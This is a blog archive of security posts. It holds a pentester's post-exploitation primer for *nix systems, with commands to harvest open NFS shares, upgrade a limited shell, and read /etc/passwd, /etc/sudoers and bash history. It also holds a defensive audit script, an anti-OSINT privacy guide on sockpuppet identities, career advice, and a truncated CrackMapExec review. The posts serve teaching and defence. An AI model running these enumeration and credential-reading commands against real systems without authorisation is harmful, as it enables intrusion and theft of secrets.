<p><b>So, You Got Access to A *NIX System… Now What?</b> (Hillbilly StoryTime, published 2020-09-01)</p><p><i><b>Note to Reader:</b> For simplicity, I will be referring to all Unix, Linux, and other Unix-like systems simply as *nix, unless a specific distinction needs to be made.</i></p><p>As a pentester, you will likely come across a *nix system at some point. If you are like many of the people I have worked with and encountered in the security industry, you are much more familiar with Microsoft Windows-based systems than with *nix systems. This is completely fine. Most attackers focus largely on Windows-based systems due to their market share, end-user exploitability, and attack surface. <a href="https://www.statista.com/statistics/701020/major-operating-systems-targeted-by-ransomware/">Microsoft Windows in 2019 made up over 97% of the most attacked operating systems</a> in the ransomware category. As a whole, *nix systems can make up a large percentage of an enterprise’s ecosystem (often not the largest), but they often receive less attention from an attack surface perspective. In most networks, the *nix systems you encounter are typically less prominent than the Microsoft Windows-based systems. Common uses of *nix systems tend to be development systems, mobile devices, database systems, embedded devices (firewalls, web cameras, etc.), web services such as JBoss, Tomcat, or Jenkins, and cloud infrastructure such as AWS. Microsoft Windows, on the other hand, is much more commonly found running on end-user workstations, email systems, and, of course, domain controllers (as well as in other roles also found on *nix).</p><p>While *nix systems are significantly different from Microsoft Windows systems, they do share some common categories of vulnerabilities, such as insecure network shares, vulnerable web services, user/system trusts, buffer overflows, and misconfigurations.</p><p>Once you identify a *nix system you wish to attack, you need to decide what approach you want to take. You do not always need a shell session on a *nix system, nor do you always need to be ‘root’. Sometimes, mounting exported NFS shares is enough to gain the information you need. A common misconfiguration on *nix systems is to export a network share without restricting it to certain IPs or users. As an attacker, you can identify any access restrictions on the target NFS shares by using the showmount command.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p>showmount -e 192.168.1.1</p><p>Export list for 192.168.1.1:</p><p>/secret 192.168.1.2</p><p>/home (everyone)</p></blockquote><p>The above example shows that 192.168.1.1 is exporting/sharing two directories. One of them, ‘/secret’, is restricted such that it can only be mounted from 192.168.1.2, whereas the other, ‘/home’, can be mounted by ‘(everyone)’. In this scenario, I would mount the ‘/home’ share locally and then search through it and its subdirectories looking for interesting files. A couple of the files I may look for are SSH keys and .history or .bash_history files, to see if they contain passwords. I have found entire database backup files stored in user home directories in the past, as well as documents containing lists of sensitive passwords for all kinds of internal systems. When I find an open NFS share, I always take the time to investigate it.</p><p>However, many times you will want shell access, so you will first need to find a way onto the target system. This could be as simple as connecting to the system via SSH or telnet with weak user passwords, or possibly by exploiting known vulnerabilities/misconfigurations in network/web services. The most common means of access to a *nix system that I have encountered are password brute-forcing/guessing, default/blank credentials for JBoss/Tomcat/Jenkins/etc., sniffing credentials from network traffic, and finally remote service exploits.</p><p><i><b>Note to Reader:</b> For the remainder of this article, we will assume you have obtained a shell session on a *nix system.</i></p><p>Once shell access to a *nix system has been obtained, the first item I usually address is whether I have a fully functional shell. You will usually be able to quickly identify if you have a limited shell (usually as a result of a web exploit, service command injection, or some other shell access which was not via SSH or telnet), as the lack of a prompt is a great indicator. To remedy this situation, my typical go-to solution is to spawn a new bash shell via python, assuming python is present on the system. Keep in mind that python may not be present while python3 is, so adjust accordingly.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p>python -c 'import pty;pty.spawn("/bin/bash")'</p><p>user@192.168.1.1:/var/www/$</p></blockquote><p>Unfortunately, this does not provide tab completion. If you are fine with that, then skip this section; otherwise, this is how to correct it. First, you will need to press Control-Z to send the shell to the background. Then type stty raw -echo. This command is responsible for allowing our bash keyboard shortcuts to pass through to the remote shell. Now we need to get back to the remote shell, so type fg. 
This should bring the remote shell back from the background. Finally, type reset to reset the terminal.</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p>stty raw -echo</p><p>fg</p><p>reset</p></blockquote><p>In most cases, this should be fine. However, you may occasionally notice that the up arrow is not working or that you cannot clear the screen. To address these issues, type the following:</p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p>user@192.168.1.1:/var/www/$ export TERM=xterm</p><p>user@192.168.1.1:/var/www/$ export SHELL=bash</p></blockquote><p>With that out of the way, you will now want to get a ‘lay of the land’. This includes identifying your access level, the OS version, which (if any) sensitive files you have access to, and which LOLBins (Living off the Land binaries; see <a href="https://gtfobins.github.io/">https://gtfobins.github.io/</a>) scripts and programs you can access.</p><ul style="text-align: left;"><li>uname -a – Current kernel version</li><li>env – Current environment variables</li><li>pwd – Current directory</li><li>whoami – Current user</li><li>history – Command history for the current user</li><li>cat ~/.bash_history – Bash history</li><li>sudo -l – Commands you can run via sudo</li><li>cat /etc/sudoers – Who is in the sudoers file</li><li>cat /etc/passwd – Additional users</li><li>find / -perm /4000 -ls – Find accessible SETUID files</li></ul><p>You can certainly do this by hand, manually typing each command and gathering the output, or you could use one of the many enumeration tools that people have developed to assist. Here is a short list of some I use:</p><ul style="text-align: left;"><li>LinEnum (<a href="https://github.com/rebootuser/LinEnum">https://github.com/rebootuser/LinEnum</a>)</li><li>LinuxPrivChecker (<a href="https://github.com/sleventyeleven/linuxprivchecker">https://github.com/sleventyeleven/linuxprivchecker</a>)</li><li>UnixPrivescCheck (<a href="https://github.com/pentestmonkey/unix-privesc-check">https://github.com/pentestmonkey/unix-privesc-check</a>)</li></ul><p>At this point, you could attempt a privilege escalation attack to root or some other privileged user account. 
That said, I would suggest investigating the files available to the current user, as you do not always need to be root to gain access to the data you want.</p><p>If you find you do need access to root or some other privileged user account, you may be able to use the data gathered previously to elevate your access, or you may wish to use a known exploit such as DirtyCow or DirtySock. It is usually a quick process to determine which exploits will work by looking at the output of uname -a for the kernel/OS version and then searching Google or <a href="https://www.exploit-db.com/">https://www.exploit-db.com/</a> for possible exploits. If you wish to approach it in a more scripted manner, you may wish to look at the Linux Exploit Suggester 2 script (<a href="https://github.com/jondonas/linux-exploit-suggester-2">https://github.com/jondonas/linux-exploit-suggester-2</a>).</p><p>This article is in no way a complete how-to on *nix systems, but I hope it provided you with some basic insight into attacking *nix systems and some thoughts as to what tools/capabilities you have to work with.</p><p>In parting, here are some additional resources for you on attacking *nix systems. Enjoy!</p><ul style="text-align: left;"><li>G0tmi1k’s ‘Basic Linux Privilege Escalation’ article:<ul><li><a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a></li></ul></li><li>IppSec YouTube videos:<ul><li><a href="https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA">https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA</a></li></ul></li><li>Null Byte YouTube video discussing Linux Exploit Suggester 2:<ul><li><a href="https://youtu.be/PE1A1j_xKUE">https://youtu.be/PE1A1j_xKUE</a></li></ul></li><li>Details and exploit for the Dirty Sock exploit:<ul><li><a href="https://initblog.com/2019/dirty-sock/">https://initblog.com/2019/dirty-sock/</a></li></ul></li><li>Details and exploits for the DirtyCow exploit:<ul><li><a href="https://dirtycow.ninja">https://dirtycow.ninja</a></li></ul></li><li>For additional practice in attacking *nix systems, consider:<ul><li>HackTheBox.eu<ul><li><a href="https://www.hackthebox.eu/">https://www.hackthebox.eu/</a></li></ul></li><li>VulnHub<ul><li><a href="https://www.vulnhub.com/">https://www.vulnhub.com/</a></li></ul></li><li>Metasploitable<ul><li><a href="https://information.rapid7.com/download-metasploitable-2017.html">https://information.rapid7.com/download-metasploitable-2017.html</a></li></ul></li></ul></li></ul>
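<p>The two misconfigurations this post leans on, NFS exports open to ‘(everyone)’ and unexpected setuid binaries (the <code>showmount -e</code> listing and the <code>find / -perm /4000</code> check above), are just as useful to an administrator auditing a host as to a tester enumerating it. The following script is an added example, not code from the original post: <code>check_exports</code> parses <code>showmount -e</code> style output and flags unrestricted exports, and <code>check_setuid</code> compares the setuid files under a directory against a baseline list so that a new one stands out. The function names, the one-path-per-line baseline format, the sample export listing and the <code>/etc/setuid-baseline.txt</code> path are all constructed for this example.</p>

```shell
#!/bin/sh
# Added example, not from the original post: two audit checks a defender can
# run to catch the misconfigurations discussed above. The function names,
# the baseline file format and the sample export listing are constructed.

# check_exports reads `showmount -e` output on stdin and prints
# "OPEN <path> <clients>" for every export that is not restricted to specific
# hosts, i.e. exported to "(everyone)" or to the "*" wildcard.
# Returns 1 if any open export was found, 0 otherwise.
check_exports() {
    awk '
        /^Export list/ { next }              # skip the header line
        NF >= 2 {
            path = $1; clients = $2
            if (clients == "(everyone)" || clients == "*") {
                printf "OPEN %s %s\n", path, clients
                open++
            }
        }
        END { if (open > 0) exit 1 }
    '
}

# check_setuid lists regular files with the setuid bit under directory $1
# (the same test as the `find / -perm /4000` command above, in POSIX form)
# and compares them with the baseline file $2, which holds one expected
# setuid path per line. Prints "NEW <path>" for each file missing from the
# baseline and returns 1 if there were any, which makes it usable as a
# simple drift check after package installs or a suspected compromise.
check_setuid() {
    dir=$1
    baseline=$2
    new=$(find "$dir" -type f -perm -4000 2>/dev/null | sort \
          | grep -vxF -f "$baseline" || true)
    if [ -n "$new" ]; then
        printf '%s\n' "$new" | sed 's/^/NEW /'
        return 1
    fi
    return 0
}

# Constructed sample, in the shape showmount -e prints (matches the listing
# in the post: /secret restricted to one host, /home open to everyone).
SAMPLE_EXPORTS='Export list for 192.168.1.1:
/secret 192.168.1.2
/home (everyone)'

# Usage, stand-alone (`sh audit.sh run`): audit the sample listing, then the
# local setuid binaries against a baseline kept at a placeholder path.
if [ "${1:-}" = "run" ]; then
    printf '%s\n' "$SAMPLE_EXPORTS" | check_exports \
        && echo "exports: ok" || echo "exports: open export found"
    check_setuid /usr/bin /etc/setuid-baseline.txt \
        && echo "setuid: ok" || echo "setuid: unexpected setuid binary"
fi
```

<p>The baseline for <code>check_setuid</code> is simply the output of the same <code>find</code> on a freshly installed host; anything that later shows up as <code>NEW</code> is either a package update worth confirming or something that should not be there.</p>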
<p>This post now redirects to <a href="https://www.trustedsec.com/blog/so-you-got-access-to-a-nix-system-now-what/">https://www.trustedsec.com/blog/so-you-got-access-to-a-nix-system-now-what/</a>.</p>
<p><b>A Beginner’s Guide To Staying Safe/Anonymous Online</b> (Hillbilly StoryTime, published 2020-05-21)</p><p><b>WHAT IS OSINT?</b></p><p>It is probably safe to assume you have heard of OSINT (Open Source INTelligence) at some point. However, if you have not, it can very generally be described as the collection and analysis of data gathered from publicly accessible sources. People who perform OSINT have a wide variety of sources they can pull from and many different techniques they can use. For example, they could scrape information about you, your friends and family, or your company from your social media profiles. They could search through the multitude of data breaches that have been made public, looking for passwords to your accounts. The amount of data that can be found online can be rather daunting. This article will cover some steps you can take to limit your exposure and others’ access to your information, and why that is important.</p><p><b>WHAT IS ANTI-OSINT?</b></p><p>Anti-OSINT is the process and techniques by which one attempts to prevent the gathering of accurate OSINT data about a person or thing. For many people, this could be imagined as the domain of entities such as spy agencies, conspiracy theorists, or hermits who are living off the grid.</p><p>In the next section, we will cover why this list is too limited and why everyone should be concerned about their privacy.</p><p><b>WHY IS ONLINE PRIVACY IMPORTANT, AND DO I NEED IT?</b></p><p>Data in all forms can be used. While this can be a positive in some instances, it can also be used for nefarious reasons. When that data is your personal information, the results can be significant.</p><p>Potential employers may search your social media profiles to get an idea of who you are, and what they find may have an impact on their impression of you. 
Other companies, such as search engines or any company that offers a service for “free”, can make a LOT of money off of you and your information. There is no such thing as a free service. If the company does not charge for their service, they are likely selling the information you provide (intentionally and unintentionally) to other data brokers. Many times, this is used for targeted marketing and market research, but it can easily be used to profile you as well.</p><p>“Bad people” can use data to do bad things to you or to other people in your name. Given a few pieces of information about you, someone could open new financial accounts in your name, request sensitive information from your health care providers, or cause any number of other issues for you.</p><p>Often I hear people tell me that they have nothing to hide and that no one is even after their information anyway. I disagree with both of those statements. Everyone has something they want to hide or protect, such as their financial account numbers or medical records. Other common pieces of information can be used in combination, such as your date of birth, mother’s maiden name, and so forth.</p><p>Other people may live or work in countries with repressive or tyrannical governments where they may face fines, imprisonment, or even death based on their activities or beliefs. For these people, maintaining anonymity and privacy is critical to their safety.</p><p>Perhaps you have someone who means to harm you. This could be a disgruntled employee, an ex-significant other, a hate group, or a random online stalker. Maintaining proper privacy and control over your information can help prevent these individuals from locating you.</p><p>Are you completely satisfied with every decision you have ever made in your life? For many of us, it is likely that you have made a few bad choices and you do not wish those to limit your possibilities in the future.</p><p>The list can go on and on. 
Ultimately, everyone probably has something they care to hide, and to the right person or company, that data can be of great importance.</p><p><b>WAIT, ALL OF MY INFORMATION IS ALREADY ONLINE?</b></p><p>In the modern era, it is likely that many companies already have substantial access to your data. Do you have an email account with Google or Microsoft? Do you play games on Facebook? Do you have completed profiles on your social media accounts? Do you have store loyalty cards? All of these result in someone having access to some aspect of your information. The question is, how do we rein it in?</p><p>First, you must accept that you will likely never be able to completely remove all of your information from online sources. However, that does not mean you cannot remove most of it.</p><p>Start by making a list of every active online account you know you have. If you are not sure you remember them all, you can use services such as <a href="https://namechk.com/">https://namechk.com/</a> and <a href="https://checkusernames.com/">https://checkusernames.com/</a> to see where your username/handle has been used.</p><p>For each account, log in and go to the profile page. Next, edit everything you can so as to remove as much accurate information about you as possible; you may not be able to change or remove every piece of information. Then, attempt to delete the account. You may ask why it’s worth changing all of your information if you are just going to delete the account anyway. Well, when the account is deleted, that does not always mean the data is wiped from the databases. This way, even if the data is not entirely wiped, it should not contain your accurate information.</p><p>With that done, you need to search for anywhere else your information has been stored. This is typically done with search engine lookups. Search for your name or any piece of identifying information, and for every site that returns results, see if they have a request form or some other way to remove your information. As mentioned before, we are striving for a best effort here – you will not be able to remove everything.</p><p><b>HOW DO I MAINTAIN MY PRIVACY?</b></p><p>Ok, so you have deleted as much of your online information as you can. Now, how do we maintain that privacy? The most critical aspect is to periodically check for new information pertaining to you online and remove it.</p><p>Another step you can take is to freeze your credit at all of the credit agencies: Equifax, TransUnion, Experian, and Innovis. This will prevent several types of identity theft attacks that can be performed against you. It will also alert you any time someone performs a credit check on you.</p><p>One simple but necessary thing that can be done is to ask friends and family not to post/share info about you or tag you in photos.</p><p>When filling out a form/application/questionnaire, only fill out as much as is required, as many times not all of the fields are necessary. Even for the necessary/required items, question why they are needed and see if you can forgo filling them in. Even if you have to fill in an answer, determine whether it is absolutely necessary for you to accurately provide that piece of information. Does the loyalty program for your grocery store need to know your real home address?</p><p><b>HOW DO I CREATE AN ALTERNATE ONLINE IDENTITY?</b></p><p>What’s that? You want even more privacy? How about creating a sockpuppet account, then? A sockpuppet is an alternate online identity, not tied back to you, that is used to hide/obscure your real identity.</p><p>First and foremost, let me be clear that I am not a lawyer, nor do I have any form of a legal background. 
You should make every effort not to perform any illegal activity, and ensure that everything you do in creating and using the sockpuppet is legal.</p><p>Now, let’s make a list of the items you will need to create your sockpuppet: a name, an email address, a physical address, possibly a phone number, and some way to pay for everything.</p><p>For a name, this can be anything you wish (I typically use some variation of my own name). Changing one letter, using your middle name instead of your first name, or even using your grandmother’s last name are all viable options here.</p><p>Next, you will probably want an email address. It is virtually impossible to do anything online without an email address. I would recommend finding an email provider that does not track your activities, does not require that you verify your information, and that encrypts your data. One possible provider is Proton Mail; however, there are many others that would work as well. Just make sure they fit your needs without compromising your desired privacy level.</p><p>If you are like most of us, you will eventually want to buy something. I would recommend that you pay cash for everything, but that is not really possible online. For online purchases, I would buy a pre-paid debit card and use that card to buy what I want online. Yes, that does incur a bit of overhead and inconvenience, but it protects your privacy and makes it significantly more difficult to tie a purchase back to you.</p><p>If you wish to have a phone number associated with your sockpuppet, the best option is a pre-paid cell phone. Many times, these can be purchased without providing any details about yourself. Also, you can pay for these in cash or with the debit card you obtained earlier.</p><p>If you buy anything online and want it shipped to you, but do not want to associate your home address with your sockpuppet, then use a mailing service where you can have the deliveries sent. It has been my experience that the best option is the UPS Store, but feel free to research this further on your own.</p><p>On the technology side of your sockpuppet, you will likely want to obscure your home IP address; the obvious choice for this is a VPN. When looking for a VPN to use, try to find one that helps maintain your privacy. It should not retain any logs/data of your activities, it should allow you to pay with your prepaid debit card, and it should not require you to provide any identifying information to set up an account. Keep evaluating different VPN providers; if a security concern arises with your current provider, switch to a different one.</p><p>For web browsers, I would suggest always using their “incognito” mode and an ad blocker. If you want additional levels of security, you could also use a Tor-enabled browser; however, using Tor over your VPN may incur a significant bandwidth throttle due to the multiple levels of protection and routing.</p><p>When it comes to passwords, you should use separate passwords for every service. This is something you should already be doing.</p><p>Finally, be willing to destroy the account if needed! If the sockpuppet gets compromised or has outlived its usefulness, then delete all associated accounts and start over. The sockpuppet account should be used for transitory activities and not be designed for long-term usage.</p><p><b>PARTING THOUGHTS…</b></p><p>The information and techniques presented above may not be for everyone. Your needs and how much privacy you feel you need will likely differ from mine. As such, use this as an intro to online privacy and some of the possibilities for how to protect your data. Use as much or as little as you feel comfortable with. Remember that our privacy and data are valuable; do not give them away for free.</p><p><b>HELPFUL RESOURCES:</b></p><p>This article was just an overview and intro to online privacy. 
There are many resources available if you would like to learn more.</p><p>Some helpful videos:</p><ul style="text-align: left;"><li>Tim Vetter – “Winning and Quitting the Privacy Game: What it *REALLY* takes to have True Privacy in the 21st Century”<ul><li><a href="https://www.youtube.com/watch?v=bxQSu06yuZc">https://www.youtube.com/watch?v=bxQSu06yuZc</a></li></ul></li><li>Scott M – “Anti-OSINT…or hiding from The Man”<ul><li><a href="https://www.youtube.com/watch?v=bxQSu06yuZc">https://www.youtube.com/watch?v=bxQSu06yuZc</a></li></ul></li><li>Michael James – “ANTI OSINT AF: How to become untouchable”<ul><li><a href="https://www.youtube.com/watch?v=WFIGP8MRSJI">https://www.youtube.com/watch?v=WFIGP8MRSJI</a></li></ul></li></ul><p>Get a new SSN: <a href="https://faq.ssa.gov/en-US/Topic/article/KA-02220">https://faq.ssa.gov/en-US/Topic/article/KA-02220</a></p><p>Get a UPS Store address: <a href="https://www.theupsstore.com/mailboxes/personal-mailboxes">https://www.theupsstore.com/mailboxes/personal-mailboxes</a></p><p>Freeze your credit:</p><ul style="text-align: left;"><li><a href="https://www.equifax.com/personal/credit-report-services/">https://www.equifax.com/personal/credit-report-services/</a></li><li><a href="https://www.experian.com/freeze/center.html">https://www.experian.com/freeze/center.html</a></li><li><a href="https://www.transunion.com/credit-freeze">https://www.transunion.com/credit-freeze</a></li><li><a href="https://www.innovis.com/securityFreeze/index">https://www.innovis.com/securityFreeze/index</a></li></ul><p>Reduce spam phone calls: <a href="https://www.donotcall.gov/">https://www.donotcall.gov/</a></p><p>Check your email address against known breaches: <a href="https://haveibeenpwned.com/">https://haveibeenpwned.com/</a></p>
<p>This post now redirects to <a href="https://www.trustedsec.com/blog/a-beginners-guide-to-staying-safe-anonymous-online/">https://www.trustedsec.com/blog/a-beginners-guide-to-staying-safe-anonymous-online/</a>.</p>
<p><b>Of Failure and Success</b> (Hillbilly StoryTime, published 2018-10-30)</p><blockquote><p><i>Experience is simply the name we give our mistakes.</i></p><p><i>— Oscar Wilde</i></p></blockquote><p>Over the course of a year, I watch many InfoSec conference presentations, whether in person at the conference or via a recording on YouTube; I read a multitude of amazing blog articles; and I follow and read the messages of many InfoSec personalities on social media. The thing that keeps coming to mind throughout all of this is, “Wow, there are some amazingly smart people out there doing some wonderful stuff.” Then following that are the thoughts, “Why am I not that good? Why is it so difficult for me to create some new tool or make some new discovery? Why do I keep making mistakes?” From discussing this with others on social media and at conferences, I have become well aware that it is not just me having these thoughts.</p><p>I cannot really speak for anyone else, but I can share my own experiences. As part of my own career, I have had some nice successes: I have presented at conferences, and I have created some useful tools. At the same time, I have had a sizable number of setbacks, mistakes, failures, and missteps. At times I have had severe difficulties seeing my own successes over the piles of failures. This has caused me to back out of speaking engagements at conferences, to not publish a new tool or blog article for fear that people would not like it or would ridicule it, and at least once it has kept me from finding a new job. At the time I felt that, due to my own perceived failures, no other employer would want to employ me. 
Because of this, I decided to just stick with a job at a company that I did not like or want.</p><p>As time has gone on, I have come to realize that I am not alone in these thoughts and situations. We tend to focus only on the successes of those we want to be like and see only the failures in ourselves. For me, it was critical to remember and realize that those I admired and looked up to have their flaws as well. They too made mistakes and had failures. But they kept moving on.</p><p>After a while, sometime around 2012, I decided to take the plunge and started submitting to several conferences and releasing some tools I had been working on. I had no idea what would happen. But I made a promise to myself that I would see it through for one year and then decide if it was a positive thing or not. At first, I was terrified, and I still am prior to any presentation, video recording, or tool release. My first conference talks were predictably bad, but as the year went on and I kept presenting, I slowly got better. Since then I have continued presenting several times a year, and I have slowly started liking it, even though I am still terrified every time I stand on the stage.</p><blockquote><p><i>It’s fine to celebrate success, but it is more important to heed the lessons of failure.</i></p><p><i>— Bill Gates</i></p></blockquote><p>Sometime in 2016, I decided I would like to try to help others like myself by sharing my stories: stories of my mistakes, failures, bad choices, and so on. So, I created a Twitter account, created a presentation slide deck to submit to conferences, and started making YouTube videos. All of this was my attempt to help others realize that we ALL make mistakes. When you see someone presenting some new exploit or an awesome piece of research, you are just seeing the final result of what was likely months, if not years, of work to get it to that point. 
Everyone gets frustrated, has setbacks, and yes, some mistakes are bigger than others. I do not discount that. But it is what you do with those mistakes and setbacks that will help determine your future.</p><p>One of my mentors from early in my career told me it is okay to make mistakes as long as you learn from them and strive to not make those same mistakes again.</p>
<p>This post now redirects to <a href="https://www.trustedsec.com/blog/failure-and-success/">https://www.trustedsec.com/blog/failure-and-success/</a>.</p>
<p><b>How Can I Become a Pentester?</b> (Hillbilly StoryTime, published 2018-09-21)</p><p>After I tell someone that I am a pentester or that I work in InfoSec, the most common question I get asked is if I can help them fix their computer. The second most common question I get is, “How can I become a pentester?”</p><p>My answer is usually fairly concise and to the point: “Learn how computers and networks work, learn what rules are in place to protect them, and then learn how to circumvent those rules.” While that answer is fine if I am in a hurry, I thought I might take this time to elaborate a bit more and provide a more helpful answer.</p><p><b>PENTESTER</b></p><p>First, let’s take a step back and understand that while the term “pentester” gets used quite often, it is not the only role/position available in Information Security (InfoSec). Within the realm of InfoSec, there are primarily two general categories: “attacker” and “defender”. Within each of the “attacker” and “defender” categories, there are numerous subcategories and roles, all of which are critical to producing and maintaining secure systems, networks, and users. While this article will focus more on the “attacker/pentester” side of the equation, the concepts could be applied to any other role as well.</p><p><b>EDUCATION</b></p><p>Does someone need a formal education in Computer Science to become a pentester? Short answer: No! I have been in the InfoSec field, mostly as a pentester, long enough to know that nearly anyone can become a pentester. I have had coworkers who had formal education in information systems as well as coworkers who used to be auto mechanics or chemical engineers. While a strong education will not go amiss, it is by no means a requirement. If you are willing to learn and educate yourself, you should do fine.</p><p>Earlier I mentioned that having a prior education in InfoSec was not a requirement. Nevertheless, I would recommend that someone looking to get into InfoSec, and people who are already in the field, continue to seek additional education and training. The InfoSec field changes rather quickly, and to keep up to date on all the latest vulnerabilities, tools, attacks, and defenses, it is imperative that you continue to educate yourself. That education can come in the form of classic college classes, InfoSec-specific training, attending conferences, or performing some self-guided research.</p><p><b>SPECIALTIES</b></p><p>One of the interesting aspects of pentesting and InfoSec as a whole is that no one is great at everything. While most pentesters are somewhat knowledgeable of most aspects of pentesting, each will generally have one or two areas in which they focus. Personally, I prefer social engineering, programming, and red-teaming; however, when it comes to mobile devices, Internet of Things (IoT), and low-level system driver attacks, I will defer to others who know those areas much better than I do. This is a great aspect of the InfoSec field. Since no one needs to know everything, we are all free to specialize as needed, and we can get help from others when we encounter a situation where we are less knowledgeable.</p><p><b>MOVING TOWARDS YOUR CAREER</b></p><p>As you start your journey toward becoming a pentester, you will find that many times it comes in handy to have a close relationship with a few more senior individuals in the field. Again, this is not necessary for becoming a pentester, but it does make certain aspects easier. This is what is typically referred to as “finding a mentor.” This mentor does not have to be just one person; you could have mentors for each of the various aspects of pentesting you wish to pursue. 
These mentors can help provide suggestions of tools and techniques to learn, suggestions of classes or training that may be of benefit, and be available to talk with about any other aspect of your career. That said, you should not necessarily allow someone else to fully guide your career path or your development. It is up to you to make those decisions, and the mentors, if you have any, are there just to provide suggestions as needed.</p><p>Talking about training, mentors, and areas of focus is great, but will that get you a job? Probably not by itself. Most employers will be looking for evidence of your abilities and knowledge. This evidence can come in many forms, such as years of experience in the field. If you are reading this, I can probably safely assume you do not have years of experience, so what else can you do? Some employers like to see certain professional certifications on your resume. I will not get into the merits of each particular certification here, but suffice it to say that some certifications hold more weight in the pentester field than others. Examples of these are OSCP, OSCE, and OSEE. If you do not have years of experience or the certifications the employers are looking for, my general suggestion is that you start a blog so that you can share samples of your knowledge. This can be write-ups about the latest exploit or vulnerability that is making the news. It could be about a new tool that someone wrote. It could even be a review of an old tool or exploit where you share your views or opinion on it. If you are a researcher, write blog articles about your research. If you are inclined toward development, start a GitHub, GitLab, or similar account where you can host any code or tools you have developed. 
At the same time, go ahead and write up a blog article about the code or tool.</p><p><b>EXPERIENCE</b></p><p>If you are looking for more pentesting experience without actually breaking the law by attacking other people’s networks, I would suggest participating in Capture the Flag (CTF) competitions. Most CTFs are free to participate in and, other than your time, will not cost you anything. Another great resource is reading the write-ups of other people who have completed CTFs. Those write-ups may contain new ideas or ways of approaching particular situations that you were not aware of. If you do not want to participate in formal CTFs, there are plenty of other standalone challenges that you can try. Most of these come in the form of downloadable VMs (Virtual Machines). You will download the VM from a site like VulnHub, load up the VM in either VMware or VirtualBox, then attempt to attack the system and achieve the specified goal. Here again, many of these will have write-ups written by other people who have completed them already.</p><p><b>RESEARCH</b></p><p>If you are more into research, then set up a home lab. This lab could be a VM server if you are focused on operating systems, or electronics gear if you are interested in hardware hacking. In both cases, I would not recommend going out and spending lots of money. You can usually run several VMs from whatever laptop or desktop you already have. As for hardware labs, you can usually get started with just a few cheap items like a soldering iron, a logic analyzer, and UART and JTAG adapters. Obviously, this is not everything you may need, but it should get you started. Now, what about targets to attack/research? For operating systems, most of us have at least one Microsoft Windows system we can possibly target, and most Linux distributions are free to download and use. 
If you want to attack hardware devices, eBay, second-hand stores and garage sales can be great resources for cheap equipment to buy and attack.</p><p><b>PERSONAL EXPERIENCE</b></p><p>Personally, I have a blog, a GitHub account, and I enjoy giving presentations at InfoSec conferences. Presenting at conferences is not something that everyone enjoys, but if you do not mind, it is a great way to present yourself to the industry, share your knowledge with everyone, and possibly get to meet potential employers. I have met so many amazing people because of my presentations and people coming up to talk to me afterward.</p><p>As a final suggestion, do not forgo developing your “soft skills” such as public communication and writing. Regardless of the path your career takes, these skills will serve you well whether it is in a job interview, presenting a report to a customer, writing a report, presenting at a conference, or even writing your resume. Ultimately, it does not matter how awesome your exploit was, or how many years of personal experience you have, if you cannot convey your ideas to others, it will mean very little.</p>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-5789294398760146186.post-64049736314909094292018-04-10T23:43:00.002-04:002020-11-17T12:46:07.620-05:00Tool Review - CrackMapExec<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://cloud.githubusercontent.com/assets/5151193/17577511/d312ceb4-5f3b-11e6-8de5-8822246289fd.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="566" data-original-width="340" height="320" src="https://cloud.githubusercontent.com/assets/5151193/17577511/d312ceb4-5f3b-11e6-8de5-8822246289fd.jpg" width="192" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2 style="text-align: left;">
Source</h2>
<div>
<a href="https://github.com/byt3bl33d3r/CrackMapExec">https://github.com/byt3bl33d3r/CrackMapExec</a></div>
<div>
<br /></div>
<h2 style="text-align: left;">
<span><a name='more'></a></span>Author(s)</h2>
<div>
Marcello Salvati/<a href="https://twitter.com/byt3bl33d3r">@byt3bl33d3r</a></div>
<div>
<br /></div>
<h2 style="text-align: left;">
Description</h2>
<div>
<div style="text-align: left;">
CrackMapExec (CME) is a post-exploitation tool that helps with discovering, enumerating, accessing, and further exploiting the hosts and data of an Active Directory network.<br />
<br /></div>
<h2 style="text-align: left;">
License</h2>
<a href="https://github.com/byt3bl33d3r/CrackMapExec/blob/master/LICENSE">BSD License</a><br />
<br />
<h2 style="text-align: left;">
How to Install</h2>
On Kali Linux it is as simple as<br />
<blockquote class="tr_bq">
<i># apt-get install crackmapexec</i></blockquote>
For other Debian/Ubuntu Linux systems, it is nearly as simple<br />
<blockquote class="tr_bq">
<i># apt-get install -y libssl-dev libffi-dev python-dev build-essential</i><br />
<i># pip install crackmapexec</i></blockquote>
If by chance you feel the need to install from source, the steps are as follows:<br />
<blockquote class="tr_bq">
<i># apt-get install -y libssl-dev libffi-dev python-dev build-essential</i><br />
<i># pip install --user pipenv</i><br />
<i># git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec</i><br />
<i># cd CrackMapExec && pipenv install</i><br />
<i># pipenv shell</i><br />
<i># python setup.py install</i></blockquote>
There are also versions available for Arch Linux and macOS. For more information please visit the <a href="https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation">wiki</a>.<br />
<br /></div>
<div>
<h2 style="text-align: left;">
Sample Usage</h2>
As with most command line tools, CME provides a useful help screen.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
